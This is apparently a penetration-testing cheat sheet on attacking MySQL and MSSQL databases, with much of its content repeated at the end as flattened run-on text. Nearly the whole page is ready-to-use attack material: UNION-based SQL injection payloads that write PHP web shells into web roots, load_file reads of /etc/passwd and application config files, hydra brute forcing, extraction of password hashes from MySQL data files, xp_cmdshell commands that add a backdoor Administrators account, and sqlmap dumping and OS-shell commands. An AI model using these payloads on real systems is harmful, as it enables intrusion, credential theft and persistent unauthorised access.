MYSQL - 3306

Shell From SQL Injection

# windows
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
# linux
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'

NMAP

ls /usr/share/nmap/scripts/ | grep MYSQL

nmap -sV -Pn -vv  10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u

Extracting MySQL credentials from files

cat /etc/mysql/debian.cnf
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Connect

# Local
mysql -u <USER>
mysql -u <USER> -p

# Remote
mysql -h <IP> -u <USER>

MySQL

# view files
' union select 1,2,3, load_file(‘/etc/passwd’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/login.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/includes/config.inc.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/mysqli_connect.php’) ,5,6,7,8 -- -	

# upload files
' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- -	
' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- -	
' union select null,null,null, "<?php system($_GET['cmd']) ?>" ,5,6,7,8 into outfile '/var/www/shell.php' -- -	
' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -

MySQL commands

show databases;
use <DATABASES>;

show tables;
describe <TABLE>;

select * from <TABLE>;

# Try to execute code
select do_system('id');
\! sh

# Read & Write
select load_file('<FILE>');
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>'


SQSH

#Login
sqsh -S <targetip>:<port> -U sa -P password

# commands
exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user kalisa pass /add'
go
exec xp_cmdshell 'net localgroup Administrators kalisa /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add'
go

------------------------------

SQLMAP
# Crawl the links
sqlmap -u http://<targetip> --crawl=1
sqlmap -u http://<targetip> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3

# Search for databases
sqlmap –u http://<targetip>/index.php?par= –dbs

# dump tables from database 
sqlmap –u http://<targetip>/index.php?par= –dbs –D dbname –tables –-dump
sqlmap –u http://<targetip>/index.php?par= –dbs –D dbname –T tablename –-dump

# OS Shell
sqlmap -u http://<targetip>/comment.php?id=738 --dbms=mysql --osshell

--------------------------------

Manual sql injection commands


# check for sqli vulnerability
?id=1'

# find the number of columns
?id=1 order by 9 -- -

# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

# Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

# Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

# Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users

# read file
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -

# create a file and call it to check if really created
?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -
	
# create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -

# then go to browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id

PreviousVNC - 5800 NextPOP3 - 110

Last updated 3 years ago

Was this helpful?

# windows ?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php' # linux ?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'

# view files ' union select 1,2,3, load_file(‘/etc/passwd’) ,5,6,7,8 -- - ' union select 1,2,3, load_file(‘/var/www/login.php’) ,5,6,7,8 -- - ' union select 1,2,3, load_file(‘/var/www/includes/config.inc.php’) ,5,6,7,8 -- - ' union select 1,2,3, load_file(‘/var/www/mysqli_connect.php’) ,5,6,7,8 -- - # upload files ' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- - ' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- - ' union select null,null,null, "<?php system($_GET['cmd']) ?>" ,5,6,7,8 into outfile '/var/www/shell.php' -- - ' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -

show databases; use <DATABASES>; show tables; describe <TABLE>; select * from <TABLE>; # Try to execute code select do_system('id'); \! sh # Read & Write select load_file('<FILE>'); select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>' SQSH #Login sqsh -S <targetip>:<port> -U sa -P password # commands exec xp_cmdshell 'whoami' go exec xp_cmdshell 'net user kalisa pass /add' go exec xp_cmdshell 'net localgroup Administrators kalisa /add' go exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add' go ------------------------------ SQLMAP # Crawl the links sqlmap -u http://<targetip> --crawl=1 sqlmap -u http://<targetip> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 # Search for databases sqlmap –u http://<targetip>/index.php?par= –dbs # dump tables from database sqlmap –u http://<targetip>/index.php?par= –dbs –D dbname –tables –-dump sqlmap –u http://<targetip>/index.php?par= –dbs –D dbname –T tablename –-dump # OS Shell sqlmap -u http://<targetip>/comment.php?id=738 --dbms=mysql --osshell --------------------------------

# check for sqli vulnerability ?id=1' # find the number of columns ?id=1 order by 9 -- - # Find space to output db ?id=1 union select 1,2,3,4,5,6,7,8,9 -- - # Get username of the sql-user ?id=1 union select 1,2,3,4,user(),6,7,8,9 -- - # Get version ?id=1 union select 1,2,3,4,version(),6,7,8,9 -- - # Get all tables ?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- - # Get all columns from a specific table ?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- - # Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password) ?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users # read file ?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- - ?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- - # create a file and call it to check if really created ?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- - ?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- - # create a file to get a shell ?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- - ?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- - # then go to browser and see if you can execute commands http://<targetip>/shell.php?cmd=id